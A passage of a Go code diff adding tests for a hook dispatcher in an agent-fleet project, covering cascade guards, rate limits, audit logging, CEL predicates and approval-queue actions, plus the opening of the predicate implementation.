+		t.Fatalf("depth-1 guard failed: expected exactly 1 pause, got %d — the cascade was not stopped", len(calls))
+	}
+	// The pause the hook performed must be marked hook-caused, which is what
+	// stops the next round.
+	if got := calls[0].cause; got.Depth != 1 || got.HookName != "pause-on-pause" {
+		t.Errorf("hook-caused transition must carry depth-1 causation, got %+v", got)
+	}
+	if calls[0].cause.OriginTransition != TransitionAgentPaused {
+		t.Errorf("causation should name the origin transition, got %q", calls[0].cause.OriginTransition)
+	}
+
+	// The suppressed second round must be visible in the audit log, not silent.
+	if len(audit.withAction(AuditHookSuppressed)) != 1 {
+		t.Errorf("expected exactly 1 depth-suppression audit entry, got %d",
+			len(audit.withAction(AuditHookSuppressed)))
+	}
+}
+
+// TestDepth1GuardPositiveControl is the companion to the cascade test: it
+// proves the same hook DOES fire on a world-caused transition. Without this,
+// the cascade test above would pass even if Fire were broken and never
+// dispatched anything.
+func TestDepth1GuardPositiveControl(t *testing.T) {
+	pauser := &fakePauser{} // no dispatcher: does not re-emit
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "p", On: TransitionAgentPaused, Action: ActionPause}),
+		quietLogger(),
+		WithPauser(pauser),
+	)
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionAgentPaused, Agent: "reviewer",
+	})
+	d.Wait()
+
+	if len(pauser.all()) != 1 {
+		t.Fatalf("positive control: a world-caused transition MUST fire its hook, got %d calls",
+			len(pauser.all()))
+	}
+}
+
+// TestFireRefusesHookCausedTransitionDirectly checks the guard at its own
+// level, independent of any action.
+func TestFireRefusesHookCausedTransitionDirectly(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "n", On: TransitionAgentPaused, Action: ActionNotify}),
+		quietLogger(),
+		WithNotifier(notifier),
+	)
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionAgentPaused,
+		Agent:      "reviewer",
+		Causation:  Causation{Depth: 1, HookName: "upstream", OriginTransition: TransitionEscalationRed},
+	})
+	d.Wait()
+
+	if notifier.count() != 0 {
+		t.Errorf("a hook-caused transition must not fire hooks, got %d notifications", notifier.count())
+	}
+}
+
+func TestCausationChildPreservesRootOrigin(t *testing.T) {
+	root := Causation{}
+	first := root.Child("hook-a", TransitionEscalationRed)
+	if first.Depth != 1 || first.OriginTransition != TransitionEscalationRed {
+		t.Fatalf("first child wrong: %+v", first)
+	}
+	// A hypothetical second level must keep the ROOT origin, not the
+	// intermediate one, so the audit trail names the real cause.
+	second := first.Child("hook-b", TransitionAgentPaused)
+	if second.OriginTransition != TransitionEscalationRed {
+		t.Errorf("root origin must be preserved, got %q", second.OriginTransition)
+	}
+	if second.MayFireHooks() {
+		t.Error("depth-2 causation must not be allowed to fire hooks")
+	}
+}
+
+func TestCausationPredicates(t *testing.T) {
+	if (Causation{}).IsHookCaused() {
+		t.Error("depth-0 is world-caused")
+	}
+	if !(Causation{Depth: 1}).MayFireHooks() == false {
+		// depth 1 must NOT fire
+	}
+	if (Causation{Depth: 1}).MayFireHooks() {
+		t.Error("depth-1 must not fire hooks")
+	}
+	if !(Causation{}).MayFireHooks() {
+		t.Error("depth-0 must fire hooks")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// GUARANTEE 4 — failure isolation
+// ---------------------------------------------------------------------------
+
+// TestOneFailingHookDoesNotAffectOthers: a hook whose sink is unwired (and so
+// errors) must not prevent the other hooks on the same transition from running.
+func TestOneFailingHookDoesNotAffectOthers(t *testing.T) {
+	notifier := &fakeNotifier{}
+	annotator := &fakeAnnotator{}
+	audit := &fakeAudit{}
+
+	// The middle hook's sink (approvals) is deliberately NOT wired, so it
+	// fails; the notify and annotate hooks must still run.
+	d := NewDispatcher(
+		mustRegistry(t,
+			Hook{Name: "notify-hook", On: TransitionReviewRejected, Action: ActionNotify},
+			Hook{Name: "broken-hook", On: TransitionReviewRejected, Action: ActionEnqueueApproval},
+			Hook{Name: "annotate-hook", On: TransitionReviewRejected, Action: ActionAnnotate},
+		),
+		quietLogger(),
+		WithNotifier(notifier),
+		WithAnnotator(annotator),
+		WithAuditSink(audit),
+	)
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "reviewer",
+	})
+	d.Wait()
+
+	if notifier.count() != 1 {
+		t.Errorf("notify hook should have run despite a sibling failing, got %d", notifier.count())
+	}
+	if len(annotator.all()) != 1 {
+		t.Errorf("annotate hook should have run despite a sibling failing, got %d", len(annotator.all()))
+	}
+
+	failures := audit.withAction(AuditHookFailed)
+	if len(failures) != 1 {
+		t.Fatalf("expected exactly 1 failure audit entry, got %d", len(failures))
+	}
+	if failures[0].fields["hook"] != "broken-hook" {
+		t.Errorf("wrong hook recorded as failed: %v", failures[0].fields["hook"])
+	}
+	if len(audit.withAction(AuditHookFired)) != 2 {
+		t.Errorf("expected 2 successful firings audited, got %d", len(audit.withAction(AuditHookFired)))
+	}
+}
+
+// TestPanickingHookIsIsolated proves the recovered boundary covers a sink that
+// panics, not just one that returns an error.
+func TestPanickingHookIsIsolated(t *testing.T) {
+	annotator := &fakeAnnotator{}
+	audit := &fakeAudit{}
+
+	d := NewDispatcher(
+		mustRegistry(t,
+			Hook{Name: "panics", On: TransitionReviewRejected, Action: ActionNotify},
+			Hook{Name: "fine", On: TransitionReviewRejected, Action: ActionAnnotate},
+		),
+		quietLogger(),
+		WithNotifier(panickingNotifier{}),
+		WithAnnotator(annotator),
+		WithAuditSink(audit),
+	)
+
+	// Must not crash the test process.
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+
+	if len(annotator.all()) != 1 {
+		t.Errorf("sibling hook should run despite a panicking hook, got %d", len(annotator.all()))
+	}
+	failures := audit.withAction(AuditHookFailed)
+	if len(failures) != 1 || !strings.Contains(failures[0].fields["error"].(string), "panic") {
+		t.Errorf("panic should be audited as a failure, got %+v", failures)
+	}
+}
+
+// TestFailingHookDoesNotAffectTheTransition: Fire must return normally even
+// when every hook fails, because the transition has already durably committed
+// and a hook must never be able to undo or block it.
+func TestFailingHookDoesNotAffectTheTransition(t *testing.T) {
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "broken", On: TransitionUpgradePause, Action: ActionNotify}),
+		quietLogger(),
+		// No notifier wired → the hook errors.
+	)
+
+	done := make(chan struct{})
+	go func() {
+		d.Fire(context.Background(), Payload{Transition: TransitionUpgradePause, To: "on"})
+		close(done)
+	}()
+
+	select {
+	case <-done:
+	case <-time.After(5 * time.Second):
+		t.Fatal("Fire must return promptly regardless of hook outcomes")
+	}
+	d.Wait()
+}
+
+// ---------------------------------------------------------------------------
+// GUARANTEE 1 — post-commit, off the critical path
+// ---------------------------------------------------------------------------
+
+// TestFireDoesNotBlockTheCallersCriticalPath: a slow hook must not extend the
+// emitting site's latency. Fire hands off to a goroutine and returns.
+func TestFireDoesNotBlockTheCallersCriticalPath(t *testing.T) {
+	release := make(chan struct{})
+	slow := &blockingAnnotator{release: release}
+
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "slow", On: TransitionSweepCompleted, Action: ActionAnnotate}),
+		quietLogger(),
+		WithAnnotator(slow),
+	)
+
+	start := time.Now()
+	d.Fire(context.Background(), Payload{Transition: TransitionSweepCompleted, Repo: "o/r"})
+	elapsed := time.Since(start)
+
+	if elapsed > time.Second {
+		t.Errorf("Fire blocked for %v; hooks must run off the critical path", elapsed)
+	}
+
+	close(release)
+	d.Wait()
+	if slow.count() != 1 {
+		t.Errorf("the hook should still have run, got %d", slow.count())
+	}
+}
+
+type blockingAnnotator struct {
+	release chan struct{}
+	mu      sync.Mutex
+	n       int
+}
+
+func (b *blockingAnnotator) Annotate(ctx context.Context, agent, issueRef, note string, attrs map[string]string) error {
+	<-b.release
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	b.n++
+	return nil
+}
+
+func (b *blockingAnnotator) count() int {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	return b.n
+}
+
+// TestNoHooksIsACheapNoOp: the overwhelmingly common case (no hooks
+// configured) must cost nothing on the post-commit path.
+func TestNoHooksIsACheapNoOp(t *testing.T) {
+	audit := &fakeAudit{}
+	d := NewDispatcher(mustRegistry(t), quietLogger(), WithAuditSink(audit))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionGovernorModeChange, From: "a", To: "b"})
+	d.Wait()
+
+	if len(audit.all()) != 0 {
+		t.Errorf("an empty registry should produce no audit noise, got %d entries", len(audit.all()))
+	}
+}
+
+func TestNilDispatcherAndNilRegistryAreSafe(t *testing.T) {
+	var d *Dispatcher
+	d.Fire(context.Background(), Payload{Transition: TransitionAgentPaused})
+	d.Wait()
+	if d.Len() != 0 {
+		t.Error("nil dispatcher should report zero hooks")
+	}
+
+	d2 := NewDispatcher(nil, quietLogger())
+	d2.Fire(context.Background(), Payload{Transition: TransitionAgentPaused})
+	d2.Wait()
+}
+
+// TestFireOnlyDispatchesMatchingTransition guards the index.
+func TestFireOnlyDispatchesMatchingTransition(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "n", On: TransitionReviewRejected, Action: ActionNotify}),
+		quietLogger(),
+		WithNotifier(notifier),
+	)
+
+	d.Fire(context.Background(), Payload{Transition: TransitionSweepCompleted, Repo: "o/r"})
+	d.Wait()
+	if notifier.count() != 0 {
+		t.Errorf("a hook must not fire on a different transition, got %d", notifier.count())
+	}
+
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("the hook should fire on its own transition, got %d", notifier.count())
+	}
+}
+
+// ---------------------------------------------------------------------------
+// GUARANTEE 3 — rate limiting
+// ---------------------------------------------------------------------------
+
+// TestRateLimitEnforcedOnDispatch drives the limit through Fire, with a frozen
+// clock so the test neither sleeps nor flakes.
+func TestRateLimitEnforcedOnDispatch(t *testing.T) {
+	notifier := &fakeNotifier{}
+	audit := &fakeAudit{}
+
+	now := time.Date(2026, 8, 12, 12, 0, 0, 0, time.UTC)
+	clock := func() time.Time { return now }
+
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "flappy", On: TransitionGovernorModeChange, Action: ActionNotify,
+			RateLimitPerMinute: 3,
+		}),
+		quietLogger(),
+		WithNotifier(notifier),
+		WithAuditSink(audit),
+		WithClock(clock),
+	)
+
+	// Ten flaps in the same instant; only 3 may get through.
+	for i := 0; i < 10; i++ {
+		d.Fire(context.Background(), Payload{
+			Transition: TransitionGovernorModeChange, From: "normal", To: "conserve",
+		})
+	}
+	d.Wait()
+
+	if notifier.count() != 3 {
+		t.Errorf("rate limit not enforced: expected 3 notifications, got %d", notifier.count())
+	}
+	if got := len(audit.withAction(AuditHookRateLimited)); got != 7 {
+		t.Errorf("expected 7 rate-limit audit entries, got %d", got)
+	}
+
+	// After the window slides, capacity returns.
+	now = now.Add(2 * time.Minute)
+	d.Fire(context.Background(), Payload{Transition: TransitionGovernorModeChange, To: "normal"})
+	d.Wait()
+	if notifier.count() != 4 {
+		t.Errorf("capacity should recover after the window, got %d total", notifier.count())
+	}
+}
+
+// TestRateLimitSurvivesRegistryReload: reloading config must not reset the
+// storm ceiling, or a reload loop becomes a way to bypass it.
+func TestRateLimitSurvivesRegistryReload(t *testing.T) {
+	notifier := &fakeNotifier{}
+	now := time.Now()
+
+	hook := Hook{
+		Name: "h", On: TransitionGovernorModeChange, Action: ActionNotify,
+		RateLimitPerMinute: 2,
+	}
+	d := NewDispatcher(mustRegistry(t, hook), quietLogger(),
+		WithNotifier(notifier), WithClock(func() time.Time { return now }))
+
+	for i := 0; i < 5; i++ {
+		d.Fire(context.Background(), Payload{Transition: TransitionGovernorModeChange, To: "x"})
+	}
+	d.Wait()
+	if notifier.count() != 2 {
+		t.Fatalf("setup: expected 2, got %d", notifier.count())
+	}
+
+	// Hot reload with the same hook.
+	d.SetRegistry(mustRegistry(t, hook))
+	d.Fire(context.Background(), Payload{Transition: TransitionGovernorModeChange, To: "y"})
+	d.Wait()
+
+	if notifier.count() != 2 {
+		t.Errorf("a config reload must not clear the rate-limit window, got %d", notifier.count())
+	}
+}
+
+func TestSetRegistrySwapsHooks(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(mustRegistry(t), quietLogger(), WithNotifier(notifier))
+	if d.Len() != 0 {
+		t.Fatalf("expected empty, got %d", d.Len())
+	}
+
+	d.SetRegistry(mustRegistry(t, Hook{
+		Name: "new", On: TransitionReviewRejected, Action: ActionNotify,
+	}))
+	if d.Len() != 1 {
+		t.Errorf("expected 1 hook after reload, got %d", d.Len())
+	}
+
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("the newly loaded hook should fire, got %d", notifier.count())
+	}
+}
+
+// ---------------------------------------------------------------------------
+// GUARANTEE 5 — every firing is audited
+// ---------------------------------------------------------------------------
+
+func TestEveryFiringIsAudited(t *testing.T) {
+	audit := &fakeAudit{}
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "audited", On: TransitionACMMLevelChange, Action: ActionNotify}),
+		quietLogger(),
+		WithNotifier(notifier),
+		WithAuditSink(audit),
+	)
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionACMMLevelChange, From: "3", To: "4", Actor: "operator",
+	})
+	d.Wait()
+
+	entries := audit.withAction(AuditHookFired)
+	if len(entries) != 1 {
+		t.Fatalf("expected 1 audit entry, got %d", len(entries))
+	}
+	e := entries[0]
+	if e.actor != auditActorSystem {
+		t.Errorf("hook firings are system-attributed, got actor %q", e.actor)
+	}
+	if e.fields["hook"] != "audited" {
+		t.Errorf("audit must name the responsible config rule, got %v", e.fields["hook"])
+	}
+	if e.fields["transition"] != string(TransitionACMMLevelChange) {
+		t.Errorf("audit must name the transition, got %v", e.fields["transition"])
+	}
+	if e.fields["action"] != string(ActionNotify) {
+		t.Errorf("audit must name the action, got %v", e.fields["action"])
+	}
+	if e.fields["outcome"] != "success" {
+		t.Errorf("expected success outcome, got %v", e.fields["outcome"])
+	}
+}
+
+func TestDispatcherWithoutAuditSinkDoesNotPanic(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "h", On: TransitionReviewRejected, Action: ActionNotify}),
+		quietLogger(), WithNotifier(notifier))
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Error("an unwired audit sink must not prevent the action")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Predicates
+// ---------------------------------------------------------------------------
+
+func TestWhenPredicateGatesFiring(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "only-reviewer", On: TransitionAgentPaused, Action: ActionNotify,
+			When: `t.agent == "reviewer"`,
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionAgentPaused, Agent: "scanner"})
+	d.Wait()
+	if notifier.count() != 0 {
+		t.Errorf("non-matching predicate should not fire, got %d", notifier.count())
+	}
+
+	d.Fire(context.Background(), Payload{Transition: TransitionAgentPaused, Agent: "reviewer"})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("matching predicate should fire, got %d", notifier.count())
+	}
+}
+
+func TestWhenPredicateReadsAttrsAndModelFields(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "stale-pin", On: TransitionReviewRejected, Action: ActionNotify,
+			When: `t.pin != "" && attr(t.attrs, "pr") != ""`,
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	// Missing pin → no fire.
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "r",
+		Attrs: map[string]string{AttrPR: "42"},
+	})
+	d.Wait()
+	if notifier.count() != 0 {
+		t.Errorf("expected no fire without a pin, got %d", notifier.count())
+	}
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "r", Pin: "20240229",
+		Attrs: map[string]string{AttrPR: "42"},
+	})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("expected a fire with pin and pr, got %d", notifier.count())
+	}
+}
+
+// TestAttrHelperIsTotalOverMissingKeys guards the operator-usability trap that
+// motivated attr(): CEL's native map index RAISES on an absent key, and under
+// the fail-closed rule a raised error is a no-match — so a predicate that looks
+// obviously correct would silently never fire. attr() must be total.
+func TestAttrHelperIsTotalOverMissingKeys(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "h", On: TransitionUpgradePause, Action: ActionNotify,
+			When: `attr(t.attrs, "missing") == ""`,
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	// A payload with a nil Attrs map entirely.
+	d.Fire(context.Background(), Payload{Transition: TransitionUpgradePause, To: "on"})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("attr() on a nil Attrs map should yield \"\", got %d fires", notifier.count())
+	}
+
+	// A populated map that simply lacks the key.
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionUpgradePause, To: "off",
+		Attrs: map[string]string{"other": "v"},
+	})
+	d.Wait()
+	if notifier.count() != 2 {
+		t.Errorf("attr() on an absent key should yield \"\", got %d fires", notifier.count())
+	}
+}
+
+// TestAttrHelperReadsPresentKeys is the positive control for attr(): it must
+// actually return values, not just always "".
+func TestAttrHelperReadsPresentKeys(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "h", On: TransitionReviewRejected, Action: ActionNotify,
+			When: `attr(t.attrs, "pr") == "4001"`,
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "a",
+		Attrs: map[string]string{AttrPR: "999"},
+	})
+	d.Wait()
+	if notifier.count() != 0 {
+		t.Errorf("non-matching attr value should not fire, got %d", notifier.count())
+	}
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "a",
+		Attrs: map[string]string{AttrPR: "4001"},
+	})
+	d.Wait()
+	if notifier.count() != 1 {
+		t.Errorf("matching attr value should fire, got %d", notifier.count())
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Actions
+// ---------------------------------------------------------------------------
+
+func TestPauseActionGoesThroughAuditedAPIWithCausation(t *testing.T) {
+	pauser := &fakePauser{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "pause-on-red", On: TransitionEscalationRed, Action: ActionPause,
+			Params: map[string]string{"agent": "fixer", "reason": "red CI"},
+		}),
+		quietLogger(), WithPauser(pauser))
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionEscalationRed, Repo: "o/r",
+	})
+	d.Wait()
+
+	calls := pauser.all()
+	if len(calls) != 1 {
+		t.Fatalf("expected 1 pause, got %d", len(calls))
+	}
+	if calls[0].agent != "fixer" || calls[0].reason != "red CI" {
+		t.Errorf("params not honored: %+v", calls[0])
+	}
+	if calls[0].cause.Depth != 1 {
+		t.Errorf("pause must carry depth-1 causation, got %+v", calls[0].cause)
+	}
+}
+
+func TestPauseActionFallsBackToPayloadAgent(t *testing.T) {
+	pauser := &fakePauser{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "p", On: TransitionAgentResumed, Action: ActionPause}),
+		quietLogger(), WithPauser(pauser))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionAgentResumed, Agent: "from-payload"})
+	d.Wait()
+
+	if calls := pauser.all(); len(calls) != 1 || calls[0].agent != "from-payload" {
+		t.Errorf("expected fallback to the payload agent, got %+v", calls)
+	}
+}
+
+func TestAnnotateActionRecordsTimelineEntryWithModelContext(t *testing.T) {
+	annotator := &fakeAnnotator{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "note-it", On: TransitionReviewRejected, Action: ActionAnnotate,
+			Params: map[string]string{"note": "quality flag"},
+		}),
+		quietLogger(), WithAnnotator(annotator))
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionReviewRejected, Agent: "reviewer",
+		Model: "claude-opus-4", Backend: "anthropic", Pin: "20240229",
+	})
+	d.Wait()
+
+	notes := annotator.all()
+	if len(notes) != 1 {
+		t.Fatalf("expected 1 annotation, got %d", len(notes))
+	}
+	if notes[0].note != "quality flag" {
+		t.Errorf("note param not honored: %q", notes[0].note)
+	}
+	// The timeline reader should see the same model context a notification
+	// would have shown.
+	for k, want := range map[string]string{
+		"hook": "note-it", "transition": string(TransitionReviewRejected),
+		"model": "claude-opus-4", "backend": "anthropic", "pin": "20240229",
+	} {
+		if notes[0].attrs[k] != want {
+			t.Errorf("attr %q: got %q, want %q", k, notes[0].attrs[k], want)
+		}
+	}
+}
+
+// TestEnqueueApprovalConsumesTheQueueAPI proves the action delegates to the
+// #4000 queue interface rather than implementing storage of its own.
+func TestEnqueueApprovalConsumesTheQueueAPI(t *testing.T) {
+	queue := &fakeApprovals{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "needs-approval", On: TransitionACMMLevelChange, Action: ActionEnqueueApproval,
+			Params: map[string]string{"kind": "acmm-raise", "summary": "Confirm level raise"},
+		}),
+		quietLogger(), WithApprovalQueue(queue))
+
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionACMMLevelChange, From: "3", To: "5", Actor: "operator",
+	})
+	d.Wait()
+
+	reqs := queue.all()
+	if len(reqs) != 1 {
+		t.Fatalf("expected 1 approval enqueued, got %d", len(reqs))
+	}
+	r := reqs[0]
+	if r.Kind != "acmm-raise" || r.Summary != "Confirm level raise" {
+		t.Errorf("params not honored: %+v", r)
+	}
+	if r.Transition != TransitionACMMLevelChange || r.HookName != "needs-approval" {
+		t.Errorf("provenance missing: %+v", r)
+	}
+	if r.Cause.Depth != 1 {
+		t.Errorf("approval must carry depth-1 causation, got %+v", r.Cause)
+	}
+}
+
+// TestUnwiredApprovalQueueFailsLoudly: until #4000 lands, an enqueue-approval
+// hook must report an error per firing rather than silently doing nothing —
+// an approval that never queues is worse than a loud failure.
+func TestUnwiredApprovalQueueFailsLoudly(t *testing.T) {
+	audit := &fakeAudit{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "unwired", On: TransitionReviewRejected, Action: ActionEnqueueApproval,
+		}),
+		quietLogger(), WithAuditSink(audit))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+
+	failures := audit.withAction(AuditHookFailed)
+	if len(failures) != 1 {
+		t.Fatalf("expected a loud failure, got %d entries", len(failures))
+	}
+	if msg, _ := failures[0].fields["error"].(string); !strings.Contains(msg, "#4000") {
+		t.Errorf("the error should point at the unlanded queue, got %q", msg)
+	}
+}
+
+func TestUnwiredSinksReportErrorsNotPanics(t *testing.T) {
+	for _, tc := range []struct {
+		action Action
+		on     Transition
+		params map[string]string
+	}{
+		{ActionNotify, TransitionReviewRejected, nil},
+		{ActionPause, TransitionAgentPaused, nil},
+		{ActionAnnotate, TransitionReviewRejected, nil},
+		{ActionEnqueueApproval, TransitionReviewRejected, nil},
+	} {
+		audit := &fakeAudit{}
+		d := NewDispatcher(
+			mustRegistry(t, Hook{
+				Name: "h", On: tc.on, Action: tc.action, Params: tc.params,
+			}),
+			quietLogger(), WithAuditSink(audit))
+
+		d.Fire(context.Background(), Payload{Transition: tc.on, Agent: "a"})
+		d.Wait()
+
+		if got := len(audit.withAction(AuditHookFailed)); got != 1 {
+			t.Errorf("action %q: expected 1 audited failure, got %d", tc.action, got)
+		}
+	}
+}
+
+func TestPauseActionPropagatesSinkError(t *testing.T) {
+	audit := &fakeAudit{}
+	pauser := &fakePauser{err: errors.New("pause API rejected")}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{Name: "p", On: TransitionAgentPaused, Action: ActionPause}),
+		quietLogger(), WithPauser(pauser), WithAuditSink(audit))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionAgentPaused, Agent: "a"})
+	d.Wait()
+
+	failures := audit.withAction(AuditHookFailed)
+	if len(failures) != 1 {
+		t.Fatalf("expected the sink error to be audited, got %d", len(failures))
+	}
+	if msg, _ := failures[0].fields["error"].(string); !strings.Contains(msg, "pause API rejected") {
+		t.Errorf("error text lost: %q", msg)
+	}
+}
+
+func TestNotifyPriorityMapping(t *testing.T) {
+	for in, want := range map[string]string{
+		"high": "high", "HIGH": "high", " low ": "low",
+		"default": "default", "": "default", "bogus": "default",
+	} {
+		if got := notifyPriority(in); got != want {
+			t.Errorf("notifyPriority(%q) = %q, want %q", in, got, want)
+		}
+	}
+}
+
+func TestNotifyHonorsCustomTitleAndMessage(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "custom", On: TransitionSweepCompleted, Action: ActionNotify,
+			Params: map[string]string{
+				"title": "Sweep done", "message": "custom body", "priority": "low",
+			},
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionSweepCompleted, Repo: "o/r"})
+	d.Wait()
+
+	sent := notifier.all()
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 notification, got %d", len(sent))
+	}
+	if sent[0].title != "Sweep done" || sent[0].message != "custom body" || sent[0].priority != "low" {
+		t.Errorf("custom params not honored: %+v", sent[0])
+	}
+}
+
+func TestExecuteRejectsUnvettedActionAsBackstop(t *testing.T) {
+	// A Hook constructed in code, bypassing registry validation, must still be
+	// refused at execution — fail-closed at both layers.
+	d := NewDispatcher(nil, quietLogger(), WithNotifier(&fakeNotifier{}))
+	err := d.execute(context.Background(), Hook{Name: "x", Action: Action("exec")}, Payload{})
+	if err == nil || !strings.Contains(err.Error(), "unknown action") {
+		t.Errorf("expected an unvetted action to be refused at execute, got %v", err)
+	}
+}

--- a/src/pkg/hooks/docsyaml_test.go
+++ b/src/pkg/hooks/docsyaml_test.go
@@ -1,0 +1,73 @@
+package hooks
+
+import (
+	"testing"
+
+	"github.com/kubestellar/hive/pkg/config"
+	"gopkg.in/yaml.v3"
+)
+
+// Every hooks: block appearing in src/docs/hooks.md must actually validate.
+func TestDocExamplesValidate(t *testing.T) {
+	examples := []string{
+		`hooks:
+  - name: review-rejected-notify
+    on: review_rejected
+    action: notify
+    params:
+      priority: high`,
+		`hooks:
+  - name: pause-reviewer-on-repeated-rejects
+    on: review_rejected
+    action: pause
+    when: t.agent == "reviewer" && t.pin != ""
+    params:
+      reason: repeated low-quality output on a stale pin`,
+		`hooks:
+  - name: surge-alert
+    on: governor_mode_change
+    action: notify
+    when: t.to == "surge"
+    params:
+      priority: high
+      title: Governor entered surge`,
+		`hooks:
+  - name: record-upgrade-pause
+    on: upgrade_pause
+    action: annotate
+    params:
+      note: upgrade delivery kill switch flipped`,
+		`hooks:
+  - name: gate-high-autonomy
+    on: acmm_level_change
+    action: enqueue-approval
+    when: t.to == "5" || t.to == "6"
+    params:
+      kind: acmm-raise
+      summary: Confirm raising fleet autonomy to L5+`,
+		`hooks:
+  - name: sweep-summary
+    on: sweep_completed
+    action: notify
+    rate_limit_per_minute: 2
+    params:
+      priority: low`,
+		`hooks:
+  - name: attr-example
+    on: review_rejected
+    action: notify
+    when: attr(t.attrs, "pr") != ""`,
+	}
+	for i, ex := range examples {
+		var cfg config.Config
+		if err := yaml.Unmarshal([]byte(ex), &cfg); err != nil {
+			t.Fatalf("example %d: yaml: %v", i, err)
+		}
+		if len(cfg.Hooks) == 0 {
+			t.Fatalf("example %d: parsed no hooks (yaml tag mismatch?)", i)
+		}
+		if _, err := CompileFromConfig(&cfg); err != nil {
+			t.Errorf("example %d (%s): docs example does not validate: %v", i, cfg.Hooks[0].Name, err)
+		}
+	}
+}

--- a/src/pkg/hooks/predicate.go
+++ b/src/pkg/hooks/predicate.go
@@ -1,0 +1,195 @@
+package hooks
+
+import (
+	"errors"
+	"fmt"
+	"log/slog"
+	"reflect"
+
+	"github.com/google/cel-go/cel"
+	"github.com/google/cel-go/common/types"
+	"github.com/google/cel-go/common/types/ref"
+	"github.com/google/cel-go/common/types/traits"
+	"github.com/google/cel-go/ext"
+	"github.com/google/cel-go/interpreter"
+)
+
+// This file implements the optional `when:` predicate on a hook, reusing the
+// CEL engine and — more importantly — the FAIL-CLOSED POSTURE that
+// pkg/celtrigger established:
+//
+//   - A malformed or non-boolean expression is rejected at COMPILE time, so a
+//     bad rule never reaches the fleet.
+//   - A runtime evaluation error, including exceeding the cost budget, is
+//     treated as NO-MATCH rather than propagating or defaulting to fire.
+//     For a hook that means "did not fire", which is the safe direction: a
+//     predicate hive cannot evaluate must not be able to trigger a pause.
+//   - Evaluation cost is bounded, so a pathological expression cannot stall
+//     the post-commit dispatch path.
+//
+// The predicate operates over the transition Payload rather than
+// celtrigger.NormalizedEvent, so it needs its own environment; the two engines
+// are intentionally separate because their activations are different shapes.
+
+// maxPredicateCost bounds CEL runtime work per predicate evaluation. Matches
+// pkg/celtrigger's budget: high enough for realistic operator predicates
+// combining field and map checks, low enough to stop pathological expressions
+// on the post-commit path.
+const maxPredicateCost uint64 = 10_000
+
+// activationVarTransition is the CEL variable name the payload is bound to.
+// `t` rather than `transition` because predicates are written inline in YAML
+// and read better short: `t.agent == "reviewer" && t.model.startsWith("opus")`.
+const activationVarTransition = "t"
+
+// celPayload is the CEL-facing projection of a Payload. It exists separately
+// from Payload because CEL native-type registration keys field names off
+// struct tags, and Payload's json tags carry `omitempty` suffixes that would
